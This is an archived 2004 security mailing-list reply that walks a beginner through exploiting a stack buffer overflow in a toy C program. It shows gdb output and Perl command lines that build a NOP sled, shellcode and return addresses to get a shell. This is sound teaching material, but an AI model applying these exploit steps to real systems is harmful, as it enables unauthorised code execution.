Security Basics mailing list archives

Re: Buffer Overflow problem

From: Krzysztof Godlewski <kgodlewski () interia pl>
Date: Fri, 7 May 2004 18:13:52 +0200

Dnia śro 5. maja 2004 08:14, John Vill napisał:

Hello Im new to this is list and I was hoping someone can help me.

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}


Hello,

The problem is incorrect padding. I'll try explaining, but keep in mind that 
I'm very far from being an expert...

On my system buf has addr 0xbffff4a0. When I run the prog like this:

Starting program: /home/kg/prog/sec/buf `perl -e 'print 
"\x90"x222'``./mkshell.pl``perl -e 'print "\xa0\xf4\xff\xbf"'`

I get:

Program received signal SIGSEGV, Segmentation fault.
0x00bffff4 in ?? ()

So I'm just one byte off from the correct location. Examining the stack proves 
that this is true:

(gdb) x/4x $esp - 8
0xbffff5a8:     0xa068732f      0x00bffff4      0x00000002      0xbffff5f4
(gdb)

The value 0xa06873f2 just before the return addr holds the missing part of my 
buffer's address. So all you have to do is move the entire address by one 
byte. So...

Starting program: /home/kg/prog/sec/buf `perl -e 'print 
"\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`

sh-2.05b$

.. it works.

A good idea is to write more than one return address on the stack, so you 
don't have to be so exact in calculating location. You just have to remember 
to jump somwhere inside the buffer. In my case, I changed the return address 
to 0xbffff4a9. Now:

Starting program: /home/kg/prog/sec/buf `perl -e 'print 
"\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

Program received signal SIGSEGV, Segmentation fault.
0xfff4a9bf in ?? ()
(gdb)

You can see there's my address on the stack, it's just incorrectly aligned. We 
can fix this by adding 1 to 3 bytes of padding:

Starting program: /home/kg/prog/sec/buf AAA`perl -e 'print 
"\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

sh-2.05b$

This approach is more likely to work, as it leaves more room for mistake.

I hope that helps.

Krzysztof Godlewski


---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors.
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the skills
of an Ethical Hacker to better assess the security of your organization.
Visit us at:
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------

Current thread:

Buffer Overflow problem John Vill (May 06)
- Re: Buffer Overflow problem Krzysztof Godlewski (May 07)
- <Possible follow-ups>
- RE: Buffer Overflow problem Steven Trewick (May 07)
  - RE: Buffer Overflow problem Shaun Colley (May 10)
- Re: Buffer Overflow problem John Vill (May 10)
  - Re: Buffer Overflow problem Krzysztof Godlewski (May 10)
- RE: Buffer Overflow problem John Vill (May 11)
  - RE: Buffer Overflow problem JTH (May 12)